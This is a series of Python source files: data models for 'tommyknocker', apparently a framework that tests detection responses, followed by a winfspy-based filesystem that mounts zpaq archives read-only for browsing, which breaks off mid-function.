@dataclass
class UpdatedResult:
value: str
## Response Objects
@dataclass
class NewMonitor:
name: str
type: MonitorType
description: Optional[str] = None
config: Optional[Dict[str, str]] = field(default_factory=dict)
@dataclass
class UpdatedMonitor:
name: Optional[str] = NotUpdated
description: Optional[str] = NotUpdated
config: Optional[Dict[str, str]] = NotUpdated
@dataclass
class NewResponse:
name: str
monitor_id: UUID
description: Optional[str] = None
monitor_parameters: Dict[str, str] = field(default_factory=dict)
@dataclass
class UpdatedResponse:
name: Optional[str] = NotUpdated
description: Optional[str] = NotUpdated
monitor_id: Optional[UUID] = NotUpdated
monitor_parameters: Optional[Dict[str, str]] = NotUpdated
@dataclass
class NewResponseExpectation:
response_id: UUID
expected: bool
timeout: int
@dataclass
class UpdatedResponseExpectation:
expected: Optional[bool] = NotUpdated
timeout: Optional[int] = NotUpdated
## Test Objects
@dataclass
class NewTestConfiguration:
name: str
description: Optional[str] = None
knock_ids: Optional[List[UUID]] = field(default_factory=list)
response_expectation_ids: Optional[List[UUID]] = field(default_factory=list)
@dataclass
class UpdatedTestConfiguration:
name: Optional[str] = NotUpdated
description: Optional[str] = NotUpdated
knock_ids: Optional[List[UUID]] = NotUpdated
response_expectation_ids: Optional[List[UUID]] = NotUpdated
@dataclass
class NewTestComponentStatus:
component_id: UUID
component_type: ComponentType
status: ComponentStatus
@dataclass
class UpdatedTestComponentStatus:
status: ComponentStatus
@dataclass
class NewTest:
configuration_id: UUID
knocker_id: UUID
@dataclass
class UpdatedTest:
configuration_id: Optional[UUID] = NotUpdated
knocker_id: Optional[UUID] = NotUpdated
@dataclass
class NewTestSuite:
name: str
    description: Optional[str] = None
test_configuration_ids: Optional[List[UUID]] = field(default_factory=list)
@dataclass
class UpdatedTestSuite:
name: Optional[str] = NotUpdated
description: Optional[str] = NotUpdated
test_configuration_ids: Optional[List[UUID]] = NotUpdated | 3,568 | Python | .py | 120 | 26.175 | 80 | 0.763274 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,555 | objects.py | loredous_tommyknocker/src/python/shared/models/objects.py | from dataclasses import dataclass, asdict, field
import datetime
import re
from typing import Any, Dict, List, Optional, Union
from uuid import UUID, uuid4
from shared.models.dbobjects import DBKnock, DBKnocker, DBMonitor, DBResponse, DBResponseExpectation, DBResult, DBRunner, DBTest, DBTestConfiguration, DBTestKnockStatus, DBTestResponseStatus
from shared.models.enums import ComponentStatus, ComponentType, MonitorType, ResultType, TestStatus
class NotUpdated:
pass
class Updateable(object):
def update(self, new):
for key, value in asdict(new).items():
if value is not NotUpdated and hasattr(self, key):
setattr(self, key, value)
def clone_with_updates(self, new):
self_dict = asdict(self)
clone = self.__class__(**self_dict)
new_dict = asdict(new)
for key, value in self_dict.items():
if new_dict.get(key, NotUpdated) is NotUpdated:
new_dict[key] = value
new = self.__class__(**new_dict)
clone.update(new)
return clone
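# Illustrative sketch of the NotUpdated sentinel (added for clarity): fields
# an Updated* object leaves at NotUpdated are skipped by Updateable.update,
# so partial updates only touch what the caller set explicitly.
def _example_partial_update():
    from shared.models.apiobjects import UpdatedKnocker  # deferred import avoids a cycle
    knocker = Knocker(name="edge-1", description="first knocker")
    knocker.update(UpdatedKnocker(name="edge-1-renamed"))
    assert knocker.description == "first knocker"  # untouched field survives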
## Knock Objects
@dataclass
class Knocker(Updateable):
name: str
description: str = ""
id: UUID = field(default_factory=uuid4)
last_seen: Optional[datetime.datetime] = None
@classmethod
def from_db(cls, db_knocker: DBKnocker):
return cls(
name=db_knocker.name,
description=db_knocker.description,
id=db_knocker.id,
last_seen=db_knocker.last_seen
)
@dataclass
class Knock(Updateable):
name: str
runner_id: UUID
command: str
description: str = ""
id: UUID = field(default_factory=uuid4)
result_ids: List[UUID] = field(default_factory=list)
@classmethod
def from_db(cls, db_knock: DBKnock):
return cls(
id=db_knock.id,
name=db_knock.name,
description=db_knock.description,
runner_id=db_knock.runner.id,
command=db_knock.command,
result_ids=[result.id for result in db_knock.results]
)
@dataclass
class Runner(Updateable):
name: str
description: str
image_name: str
image_tag: str
id: UUID = field(default_factory=uuid4)
@classmethod
def from_db(cls, db_runner: DBRunner):
return cls(
name=db_runner.name,
description=db_runner.description,
id=db_runner.id,
image_name=db_runner.image_name,
image_tag=db_runner.image_tag
)
@dataclass
class Result(Updateable):
type: ResultType
value: str
id: UUID = field(default_factory=uuid4)
@classmethod
def from_db(cls, db_result: DBResult):
return cls(
id=db_result.id,
type=db_result.type,
value=db_result.value
)
    def check_result(self, exit_code: int = 0, output: bytes = b"") -> bool:
if self.type == ResultType.EXIT_CODE:
return str(exit_code) == self.value
elif self.type == ResultType.PRESENT_IN_OUTPUT:
return self.value in output.decode()
elif self.type == ResultType.REGEX_MATCH_OUTPUT:
return bool(re.match(self.value, output.decode()))
else:
return False
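# Worked examples of the three ResultType checks (illustrative; `output` is
# the raw process output as bytes, matching the decode() calls above).
def _example_check_results():
    assert Result(type=ResultType.EXIT_CODE, value="0").check_result(exit_code=0)
    assert Result(type=ResultType.PRESENT_IN_OUTPUT, value="Hello").check_result(output=b"Hello World!")
    assert Result(type=ResultType.REGEX_MATCH_OUTPUT, value=r"H\w+ World").check_result(output=b"Hello World!")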
## Response Objects
@dataclass
class Monitor(Updateable):
name: str
type: MonitorType
config: Dict[str, Any] = field(default_factory=dict)
description: str = ""
id: UUID = field(default_factory=uuid4)
@classmethod
def from_db(cls, db_monitor: DBMonitor):
return cls(
name=db_monitor.name,
description=db_monitor.description,
id=db_monitor.id,
type=db_monitor.type,
config=db_monitor.config
)
@dataclass
class Response(Updateable):
name: str
monitor_id: UUID
monitor_parameters: Dict[str, str]
description: str = ""
id: UUID = field(default_factory=uuid4)
@classmethod
def from_db(cls, db_response: DBResponse):
return cls(
name=db_response.name,
description=db_response.description,
id=db_response.id,
monitor_id=db_response.monitor.id,
monitor_parameters=db_response.monitor_parameters
)
@dataclass
class ResponseExpectation(Updateable):
response_id: UUID
expected: bool
timeout: int
id: UUID = field(default_factory=uuid4)
@classmethod
def from_db(cls, db_response_expectation: DBResponseExpectation):
return cls(
id=db_response_expectation.id,
response_id=db_response_expectation.response.id,
expected=db_response_expectation.expected,
timeout=db_response_expectation.timeout
)
## Test Objects
@dataclass
class TestConfiguration(Updateable):
name: str
id: UUID = field(default_factory=uuid4)
description: str = ""
knock_ids: List[UUID] = field(default_factory=list)
response_expectation_ids: List[UUID] = field(default_factory=list)
@classmethod
def from_db(cls, db_test_configuration: DBTestConfiguration):
return cls(
name=db_test_configuration.name,
description=db_test_configuration.description,
id=db_test_configuration.id,
knock_ids=[knock.id for knock in db_test_configuration.knocks],
response_expectation_ids=[response_expectation.id for response_expectation in db_test_configuration.response_expectations]
)
@dataclass
class TestComponentStatus(Updateable):
component_id: UUID
component_type: ComponentType
status: ComponentStatus
id: UUID = field(default_factory=uuid4)
updated: Optional[datetime.datetime] = None
@classmethod
def from_db(cls, db_test_component_status: Union[DBTestKnockStatus, DBTestResponseStatus]):
if isinstance(db_test_component_status, DBTestKnockStatus):
return cls(
id=db_test_component_status.id,
component_id=db_test_component_status.knock.id,
component_type=ComponentType.KNOCK,
status=db_test_component_status.status,
updated=db_test_component_status.updated
)
else:
return cls(
id=db_test_component_status.id,
component_id=db_test_component_status.response.id,
component_type=ComponentType.RESPONSE,
status=db_test_component_status.status,
updated=db_test_component_status.updated
)
@dataclass
class Test(Updateable):
configuration_id: UUID
knocker_id: UUID
id: UUID = field(default_factory=uuid4)
started: Optional[datetime.datetime] = None
ended: Optional[datetime.datetime] = None
status: TestStatus = TestStatus.PENDING
component_status_ids: List[UUID] = field(default_factory=list)
@classmethod
def from_db(cls, db_test: DBTest):
return cls(
id=db_test.id,
configuration_id=db_test.configuration.id,
knocker_id=db_test.knocker.id,
started=db_test.started,
ended=db_test.ended,
status=db_test.status,
component_status_ids=[component_status.id for component_status in db_test.knock_statuses + db_test.response_statuses]
)
@dataclass
class TestSuite(Updateable):
name: str
id: UUID = field(default_factory=uuid4)
description: str = ""
    test_configuration_ids: List[UUID] = field(default_factory=list)
@classmethod
def from_db(cls, db_test_suite):
return cls(
id=db_test_suite.id,
name=db_test_suite.name,
description=db_test_suite.description,
            test_configuration_ids=[test_configuration.id for test_configuration in db_test_suite.test_configurations]
) | 7,860 | Python | .py | 218 | 28.087156 | 190 | 0.653507 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,556 | dbobjects.py | loredous_tommyknocker/src/python/shared/models/dbobjects.py | from datetime import datetime
import sqlalchemy
from sqlalchemy.orm import DeclarativeBase, Mapped, mapped_column, relationship
from typing import Dict, List, Optional
from uuid import UUID
from shared.models.enums import MonitorType, ResultType, TestStatus, ComponentStatus
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from shared.models.objects import Knock, Knocker, Monitor, Response, ResponseExpectation, Result, Runner, TestComponentStatus, TestConfiguration
class Base(DeclarativeBase):
pass
## Knock Objects
class DBKnocker(Base):
__tablename__ = 'knockers'
name: Mapped[str] = mapped_column(sqlalchemy.String)
description: Mapped[Optional[str]] = mapped_column(sqlalchemy.String)
id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, primary_key=True)
last_seen: Mapped[datetime] = mapped_column(sqlalchemy.DateTime)
knock_results = sqlalchemy.Table(
'knock_results',
Base.metadata,
sqlalchemy.Column('knock_id', sqlalchemy.String, sqlalchemy.ForeignKey('knocks.id')),
sqlalchemy.Column('result_id', sqlalchemy.String, sqlalchemy.ForeignKey('results.id'))
)
class DBKnock(Base):
__tablename__ = 'knocks'
id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, primary_key=True)
name: Mapped[str] = mapped_column(sqlalchemy.String)
description: Mapped[Optional[str]] = mapped_column(sqlalchemy.String)
runner_id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, sqlalchemy.ForeignKey('runners.id'))
runner: Mapped["Runner"] = relationship("DBRunner")
command: Mapped[str] = mapped_column(sqlalchemy.String)
results: Mapped[List["Result"]] = relationship("DBResult", secondary="knock_results")
class DBRunner(Base):
__tablename__ = 'runners'
name: Mapped[str] = mapped_column(sqlalchemy.String)
description: Mapped[Optional[str]] = mapped_column(sqlalchemy.String)
id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, primary_key=True)
image_name: Mapped[str] = mapped_column(sqlalchemy.String)
image_tag: Mapped[str] = mapped_column(sqlalchemy.String)
class DBResult(Base):
__tablename__ = 'results'
id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, primary_key=True)
type: Mapped[ResultType] = mapped_column(sqlalchemy.Enum(ResultType))
value: Mapped[str] = mapped_column(sqlalchemy.String)
## Response Objects
class DBMonitor(Base):
__tablename__ = 'monitors'
name: Mapped[str] = mapped_column(sqlalchemy.String)
description: Mapped[Optional[str]] = mapped_column(sqlalchemy.String)
id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, primary_key=True)
type: Mapped[MonitorType] = mapped_column(sqlalchemy.Enum(MonitorType))
config: Mapped[Dict[str, str]] = mapped_column(sqlalchemy.JSON)
class DBResponse(Base):
__tablename__ = 'responses'
name: Mapped[str] = mapped_column(sqlalchemy.String)
description: Mapped[Optional[str]] = mapped_column(sqlalchemy.String)
id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, primary_key=True)
monitor_id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, sqlalchemy.ForeignKey('monitors.id'))
monitor: Mapped["Monitor"] = relationship("DBMonitor")
monitor_parameters: Mapped[Dict[str, str]] = mapped_column(sqlalchemy.JSON)
class DBResponseExpectation(Base):
__tablename__ = 'response_expectations'
id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, primary_key=True)
    # Fields mirror shared.models.objects.ResponseExpectation.from_db
    response_id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, sqlalchemy.ForeignKey('responses.id'))
    response: Mapped["Response"] = relationship("DBResponse")
    expected: Mapped[bool] = mapped_column(sqlalchemy.Boolean)
    timeout: Mapped[int] = mapped_column(sqlalchemy.Integer)
## Test Objects
test_knocks = sqlalchemy.Table(
'test_knocks',
Base.metadata,
sqlalchemy.Column('test_configuration_id', sqlalchemy.String, sqlalchemy.ForeignKey('test_configurations.id')),
sqlalchemy.Column('knock_id', sqlalchemy.String, sqlalchemy.ForeignKey('knocks.id'))
)
test_response_expectations = sqlalchemy.Table(
'test_response_expectations',
Base.metadata,
sqlalchemy.Column('test_configuration_id', sqlalchemy.String, sqlalchemy.ForeignKey('test_configurations.id')),
sqlalchemy.Column('response_expectation_id', sqlalchemy.String, sqlalchemy.ForeignKey('response_expectations.id'))
)
class DBTestConfiguration(Base):
__tablename__ = 'test_configurations'
name: Mapped[str] = mapped_column(sqlalchemy.String)
description: Mapped[Optional[str]] = mapped_column(sqlalchemy.String)
id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, primary_key=True)
knocks: Mapped[List["Knock"]] = relationship("DBKnock", secondary="test_knocks")
response_expectations: Mapped[List["ResponseExpectation"]] = relationship("DBResponseExpectation", secondary="test_response_expectations")
class DBTestKnockStatus(Base):
__tablename__ = 'test_knock_statuses'
id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, primary_key=True)
status: Mapped[ComponentStatus] = mapped_column(sqlalchemy.Enum(ComponentStatus))
knock_id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, sqlalchemy.ForeignKey('knocks.id'))
knock: Mapped["Knock"] = relationship("DBKnock")
updated: Mapped[datetime] = mapped_column(sqlalchemy.DateTime)
class DBTestResponseStatus(Base):
__tablename__ = 'test_response_statuses'
id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, primary_key=True)
status: Mapped[ComponentStatus] = mapped_column(sqlalchemy.Enum(ComponentStatus))
response_id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, sqlalchemy.ForeignKey('responses.id'))
response: Mapped["Response"] = relationship("DBResponse")
updated: Mapped[datetime] = mapped_column(sqlalchemy.DateTime)
test_knock_statuses = sqlalchemy.Table(
'test_knock_status_relationships',
Base.metadata,
sqlalchemy.Column('test_id', sqlalchemy.String, sqlalchemy.ForeignKey('tests.id')),
sqlalchemy.Column('knock_status_id', sqlalchemy.String, sqlalchemy.ForeignKey('test_knock_statuses.id'))
)
test_response_statuses = sqlalchemy.Table(
'test_response_status_relationships',
Base.metadata,
sqlalchemy.Column('test_id', sqlalchemy.String, sqlalchemy.ForeignKey('tests.id')),
sqlalchemy.Column('response_status_id', sqlalchemy.String, sqlalchemy.ForeignKey('test_response_statuses.id'))
)
class DBTest(Base):
__tablename__ = 'tests'
id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, primary_key=True)
configuration_id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, sqlalchemy.ForeignKey('test_configurations.id'))
configuration: Mapped["TestConfiguration"] = relationship("DBTestConfiguration")
knocker_id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, sqlalchemy.ForeignKey('knockers.id'))
knocker: Mapped["Knocker"] = relationship("DBKnocker")
started: Mapped[datetime] = mapped_column(sqlalchemy.DateTime)
ended: Mapped[datetime] = mapped_column(sqlalchemy.DateTime)
status: Mapped[TestStatus] = mapped_column(sqlalchemy.Enum(TestStatus))
knock_statuses: Mapped[List["TestComponentStatus"]] = relationship("DBTestKnockStatus", secondary="test_knock_status_relationships")
response_statuses: Mapped[List["TestComponentStatus"]] = relationship("DBTestResponseStatus", secondary="test_response_status_relationships") | 7,182 | Python | .py | 124 | 53.620968 | 148 | 0.758163 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,557 | zpaq_fileexplorer.py | EpicGazel_ZpaqTreeView/zpaq_fileexplorer.py | import os
from tkinter import filedialog
from os import getcwd
import zpaqtreeview as ztv
import sys
import logging
import argparse
import threading
from functools import wraps
from pathlib import Path, PureWindowsPath
from winfspy import (
FileSystem,
BaseFileSystemOperations,
enable_debug_log,
FILE_ATTRIBUTE,
CREATE_FILE_CREATE_OPTIONS,
NTStatusObjectNameNotFound,
NTStatusDirectoryNotEmpty,
NTStatusNotADirectory,
NTStatusObjectNameCollision,
NTStatusAccessDenied,
NTStatusEndOfFile,
NTStatusMediaWriteProtected,
)
from winfspy.plumbing.win32_filetime import filetime_now
from winfspy.plumbing.security_descriptor import SecurityDescriptor
from tqdm import tqdm
def operation(fn):
"""Decorator for file system operations.
Provides both logging and thread-safety
"""
name = fn.__name__
@wraps(fn)
def wrapper(self, *args, **kwargs):
head = args[0] if args else None
tail = args[1:] if args else ()
try:
with self._thread_lock:
result = fn(self, *args, **kwargs)
except Exception as exc:
logging.info(f" NOK | {name:20} | {head!r:20} | {tail!r:20} | {exc!r}")
raise
else:
logging.info(f" OK! | {name:20} | {head!r:20} | {tail!r:20} | {result!r}")
return result
return wrapper
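# Minimal sketch of what @operation provides (illustrative): the host class
# only needs a `_thread_lock`; every call is then serialized and logged.
#
#   class _Demo:
#       def __init__(self):
#           self._thread_lock = threading.Lock()
#       @operation
#       def touch(self, name):
#           return f"touched {name}"
#   _Demo().touch("foo")  # logs " OK! | touch ... | 'foo' ..."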
class BaseFileObj:
@property
def name(self):
"""File name, without the path"""
return self.path.name
@property
def file_name(self):
"""File name, including the path"""
return str(self.path)
def __init__(self, path, attributes, security_descriptor, file_data):
self.path = path
self.file_data = file_data
self.attributes = attributes
self.security_descriptor = security_descriptor
now = filetime_now()
self.creation_time = now
self.last_access_time = now
self.last_write_time = now
self.change_time = now
self.index_number = 0
self.file_size = 0
def get_file_info(self):
return {
"file_attributes": self.attributes,
"allocation_size": self.allocation_size,
"file_size": self.file_size,
"creation_time": self.creation_time,
"last_access_time": self.last_access_time,
"last_write_time": self.last_write_time,
"change_time": self.change_time,
"index_number": self.index_number,
}
def __repr__(self):
return f"{type(self).__name__}:{self.file_name}"
class FileObj(BaseFileObj):
allocation_unit = 4096
def __init__(self, path, attributes, security_descriptor, file_data, allocation_size=0):
super().__init__(path, attributes, security_descriptor, file_data)
self.data = bytearray(allocation_size)
self.attributes |= FILE_ATTRIBUTE.FILE_ATTRIBUTE_ARCHIVE
assert not self.attributes & FILE_ATTRIBUTE.FILE_ATTRIBUTE_DIRECTORY
@property
def allocation_size(self):
        return len(self.data) if isinstance(self.data, bytearray) else 0
def set_allocation_size(self, allocation_size):
if allocation_size < self.allocation_size:
self.data = self.data[:allocation_size]
if allocation_size > self.allocation_size:
self.data += bytearray(allocation_size - self.allocation_size)
assert self.allocation_size == allocation_size
self.file_size = min(self.file_size, allocation_size)
def adapt_allocation_size(self, file_size):
units = (file_size + self.allocation_unit - 1) // self.allocation_unit
self.set_allocation_size(units * self.allocation_unit)
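        # Worked example (illustrative): with allocation_unit = 4096, a
        # file_size of 5000 rounds up to units = (5000 + 4095) // 4096 = 2,
        # i.e. an 8192-byte allocation.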
def set_file_size(self, file_size):
if file_size < self.file_size:
zeros = bytearray(self.file_size - file_size)
self.data[file_size : self.file_size] = zeros
if file_size > self.allocation_size:
self.adapt_allocation_size(file_size)
self.file_size = file_size
# def read(self, offset, length):
# if offset >= self.file_size:
# raise NTStatusEndOfFile()
# end_offset = min(self.file_size, offset + length)
#
# if self.file_size < self.max_cache_size: # 5 MB
# ex_file = ztv.extract_file(config, "B:/g_small.zpaq", self.file_data.fullPath,
# "%userprofile%/AppData/Local/", self.file_data.is_directory())
#
# file_bytes = 0
# with open(ex_file, 'rb') as f:
# file_bytes = f.read()
#
# self.data = file_bytes
# return file_bytes #self.data[offset:end_offset]
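# Hedged sketch (added, never called by this module): mirrors the rounding in
# FileObj.adapt_allocation_size() so the allocation policy is easy to verify
# in isolation, e.g. _example_allocation_rounding(5000) == 8192.
def _example_allocation_rounding(file_size, allocation_unit=4096):
    """Round file_size up to whole allocation units, as adapt_allocation_size does."""
    units = (file_size + allocation_unit - 1) // allocation_unit
    return units * allocation_unit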
class FolderObj(BaseFileObj):
def __init__(self, path, attributes, security_descriptor, file_data):
super().__init__(path, attributes, security_descriptor, file_data)
self.allocation_size = 0
assert self.attributes & FILE_ATTRIBUTE.FILE_ATTRIBUTE_DIRECTORY
class OpenedObj:
def __init__(self, file_obj):
self.file_obj = file_obj
def __repr__(self):
return f"{type(self).__name__}:{self.file_obj.file_name}"
class ZpaqFileSystemOperations(BaseFileSystemOperations):
def __init__(self, volume_label, input_file, cache_location, max_cache_size, config, read_only=False):
super().__init__()
if len(volume_label) > 31:
raise ValueError("`volume_label` must be 31 characters long max")
max_file_nodes = 1024
max_file_size = 16 * 1024 * 1024
file_nodes = 1
self._volume_info = {
"total_size": max_file_nodes * max_file_size,
"free_size": 0, #(max_file_nodes - file_nodes) * max_file_size,
"volume_label": volume_label,
}
self.input_file = input_file
self.max_cache_size = max_cache_size
self.config = config
self.cache_location = os.path.abspath(cache_location)
self.read_only = read_only
self._root_path = PureWindowsPath("/")
self._root_obj = FolderObj(
self._root_path,
FILE_ATTRIBUTE.FILE_ATTRIBUTE_DIRECTORY,
SecurityDescriptor.from_string("O:BAG:BAD:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;WD)"), None
)
self._entries = {self._root_path: self._root_obj}
self._thread_lock = threading.Lock()
# Debugging helpers
def _create_directory(self, path, file_data):
path = self._root_path / path
obj = FolderObj(
path,
FILE_ATTRIBUTE.FILE_ATTRIBUTE_DIRECTORY,
self._root_obj.security_descriptor,
file_data
)
self._entries[path] = obj
def _import_files(self, file_path, file_data):
file_path = Path(file_path)
path = self._root_path / file_path.name
        obj = FileObj(
            path,
            FILE_ATTRIBUTE.FILE_ATTRIBUTE_ARCHIVE,
            self._root_obj.security_descriptor,  # constructor order is (path, attributes, security_descriptor, file_data)
            file_data,
        )
self._entries[path] = obj
        obj.write(file_path.read_bytes(), 0, False)  # NOTE: FileObj in this read-only variant defines no write(); this debug helper would fail if called
# Winfsp operations
@operation
def get_volume_info(self):
return self._volume_info
@operation
def set_volume_label(self, volume_label):
self._volume_info["volume_label"] = volume_label
@operation
def get_security_by_name(self, file_name):
file_name = PureWindowsPath(file_name)
# Retrieve file
try:
file_obj = self._entries[file_name]
except KeyError:
raise NTStatusObjectNameNotFound()
return (
file_obj.attributes,
file_obj.security_descriptor.handle,
file_obj.security_descriptor.size,
)
@operation
def create(
self,
file_name,
create_options,
granted_access,
file_attributes,
security_descriptor,
allocation_size,
file_data,
):
if self.read_only:
raise NTStatusMediaWriteProtected()
file_name = PureWindowsPath(file_name)
        # `granted_access` is already handled by winfsp
# `allocation_size` useless for us
# Retrieve file
try:
parent_file_obj = self._entries[file_name.parent]
if isinstance(parent_file_obj, FileObj):
raise NTStatusNotADirectory()
except KeyError:
raise NTStatusObjectNameNotFound()
# File/Folder already exists
if file_name in self._entries:
raise NTStatusObjectNameCollision()
if create_options & CREATE_FILE_CREATE_OPTIONS.FILE_DIRECTORY_FILE:
file_obj = self._entries[file_name] = FolderObj(
file_name, file_attributes, security_descriptor, file_data
)
else:
file_obj = self._entries[file_name] = FileObj(
file_name,
file_attributes,
security_descriptor,
file_data,
allocation_size,
)
return OpenedObj(file_obj)
@operation
def get_security(self, file_context):
return file_context.file_obj.security_descriptor
@operation
def set_security(self, file_context, security_information, modification_descriptor):
raise NotImplementedError()
@operation
def rename(self, file_context, file_name, new_file_name, replace_if_exists):
raise NotImplementedError()
@operation
def open(self, file_name, create_options, granted_access):
file_name = PureWindowsPath(file_name)
        # `granted_access` is already handled by winfsp
# Retrieve file
try:
file_obj = self._entries[file_name]
except KeyError:
raise NTStatusObjectNameNotFound()
return OpenedObj(file_obj)
@operation
def close(self, file_context):
pass
@operation
def get_file_info(self, file_context):
return file_context.file_obj.get_file_info()
@operation
def set_basic_info(
self,
file_context,
file_attributes,
creation_time,
last_access_time,
last_write_time,
change_time,
file_info,
) -> dict:
if self.read_only:
raise NTStatusMediaWriteProtected()
file_obj = file_context.file_obj
if file_attributes != FILE_ATTRIBUTE.INVALID_FILE_ATTRIBUTES:
file_obj.attributes = file_attributes
if creation_time:
file_obj.creation_time = creation_time
if last_access_time:
file_obj.last_access_time = last_access_time
if last_write_time:
file_obj.last_write_time = last_write_time
if change_time:
file_obj.change_time = change_time
return file_obj.get_file_info()
@operation
def set_file_size(self, file_context, new_size, set_allocation_size):
if self.read_only:
raise NTStatusMediaWriteProtected()
if set_allocation_size:
file_context.file_obj.set_allocation_size(new_size)
else:
file_context.file_obj.set_file_size(new_size)
@operation
def can_delete(self, file_context, file_name: str) -> None:
raise NotImplementedError()
@operation
def read_directory(self, file_context, marker):
entries = []
file_obj = file_context.file_obj
# Not a directory
if isinstance(file_obj, FileObj):
raise NTStatusNotADirectory()
# The "." and ".." should ONLY be included if the queried directory is not root
if file_obj.path != self._root_path:
parent_obj = self._entries[file_obj.path.parent]
entries.append({"file_name": ".", **file_obj.get_file_info()})
entries.append({"file_name": "..", **parent_obj.get_file_info()})
# Loop over all entries
for entry_path, entry_obj in self._entries.items():
try:
relative = entry_path.relative_to(file_obj.path)
# Filter out unrelated entries
except ValueError:
continue
            # Filter out ourselves and our grandchildren
if len(relative.parts) != 1:
continue
            # Add direct children to the entry list
entries.append({"file_name": entry_path.name, **entry_obj.get_file_info()})
# Sort the entries
entries = sorted(entries, key=lambda x: x["file_name"])
# No filtering to apply
if marker is None:
return entries
# Filter out all results before the marker
for i, entry in enumerate(entries):
if entry["file_name"] == marker:
return entries[i + 1 :]
@operation
def get_dir_info_by_name(self, file_context, file_name):
path = file_context.file_obj.path / file_name
try:
entry_obj = self._entries[path]
except KeyError:
raise NTStatusObjectNameNotFound()
return {"file_name": file_name, **entry_obj.get_file_info()}
# @operation
# def read(self, file_context, offset, length):
# if len(file_context.file_obj.data) == 0:
# ex_file = None
    #         if file_context.file_obj.file_size < self.max_cache_size: # 30 MB default
# ex_file = ztv.extract_file(self.config, self.input_file, file_context.file_obj.file_data.fullPath,
# self.cache_location, file_context.file_obj.file_data.is_directory())
# if ex_file is not None:
# with open(ex_file, 'rb') as f:
# file_context.file_obj.data = bytearray(f.read())
#
# end_offset = min(file_context.file_obj.file_size, offset + length)
# return file_context.file_obj.data[offset:end_offset]
# else:
# file_context.file_obj.data = bytearray(1)
# return file_context.file_obj.data
#
# if len(file_context.file_obj.data) > 1:
# end_offset = min(file_context.file_obj.file_size, offset + length)
# return file_context.file_obj.data[offset:end_offset]
#
# return bytearray(1)
@operation
def read(self, file_context, offset, length):
if len(file_context.file_obj.data) == 0:
if file_context.file_obj.file_size < self.max_cache_size: # 30MB default
file_context.file_obj.data = bytearray(
ztv.read_file(self.config, self.input_file, file_context.file_obj.file_data.fullPath))
else:
file_context.file_obj.data = bytearray(1)
return file_context.file_obj.data[offset:offset + length]
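    # Added note: read() materializes file contents lazily. On first access a
    # file smaller than max_cache_size is extracted from the archive in one go
    # (ztv.read_file shells out to zpaqfranz with -stdout) and kept in memory;
    # anything larger is given a 1-byte placeholder, so oversized files read
    # back as effectively empty instead of being streamed.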
@operation
def write(self, file_context, buffer, offset, write_to_end_of_file, constrained_io):
raise NotImplementedError()
@operation
def cleanup(self, file_context, file_name, flags) -> None:
raise NotImplementedError()
@operation
def overwrite(
self, file_context, file_attributes, replace_file_attributes: bool, allocation_size: int
) -> None:
raise NotImplementedError()
@operation
def flush(self, file_context) -> None:
pass
def create_memory_file_system(
mountpoint, label="memfs", prefix="", verbose=True, debug=False, testing=False,
    input_file="", cache_location="%userprofile%/AppData/Local/", max_cache_size=30 * 10**6, config=None):
if debug:
enable_debug_log()
if verbose:
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
# The avast workaround is not necessary with drives
# Also, it is not compatible with winfsp-tests
mountpoint = Path(mountpoint)
is_drive = mountpoint.parent == mountpoint
reject_irp_prior_to_transact0 = not is_drive and not testing
operations = ZpaqFileSystemOperations(label, input_file, cache_location, max_cache_size, config)
fs = FileSystem(
str(mountpoint),
operations,
sector_size=512,
sectors_per_allocation_unit=1,
volume_creation_time=filetime_now(),
volume_serial_number=0,
file_info_timeout=1000,
case_sensitive_search=1,
case_preserved_names=1,
unicode_on_disk=1,
persistent_acls=1,
post_cleanup_when_modified_only=1,
um_file_context_is_user_context2=1,
file_system_name=str(mountpoint),
prefix=prefix,
debug=debug,
reject_irp_prior_to_transact0=reject_irp_prior_to_transact0,
# security_timeout_valid=1,
# security_timeout=10000,
)
return fs
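# Hedged usage sketch (added; "X:" and "backup.zpaq" are placeholder values):
#
#   config = ztv.load_create_config()
#   fs = create_memory_file_system("X:", label="zpaq", input_file="backup.zpaq",
#                                  cache_location="./cache", config=config)
#   fs.start()
#   convert_filetree(config, "backup.zpaq", fs)  # populate entries from the archive
#   ...
#   fs.stop()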
def convert_filetree(config, file_path, fs):
tl_tree = ztv.main(config, file_path)
tl_node_stack = [tl_tree.get_node(tl_tree.root)]
new_path = tl_tree.get_node(tl_tree.root).data.fullPath.replace(tl_tree.root, fs.mountpoint) + "/"
print("In convert before first create.")
# fs_root = fs.operations.create(new_path, CREATE_FILE_CREATE_OPTIONS.FILE_DIRECTORY_FILE, None,
# FILE_ATTRIBUTE.FILE_ATTRIBUTE_DIRECTORY, None, 0, tl_tree.get_node(tl_tree.root).data)
# fs_stack = [fs_root]
# fs_root = fs.operations._create_directory(new_path, tl_tree.get_node(tl_tree.root).data)
print("Converting file tree to winfspy structure...")
bar = tqdm(total=tl_tree.size(), unit="nodes", colour="green", leave=False)
while len(tl_node_stack) > 0:
tl_node = tl_node_stack.pop()
# fs_node = fs_stack.pop()
#children_sorted = tl_tree.children(tl_node.tag)
#children_sorted.sort(key=lambda x: (x.is_leaf(), x.data.name.lower())) # TODO: check if necessary to sort
if (tl_node.data.is_directory()):
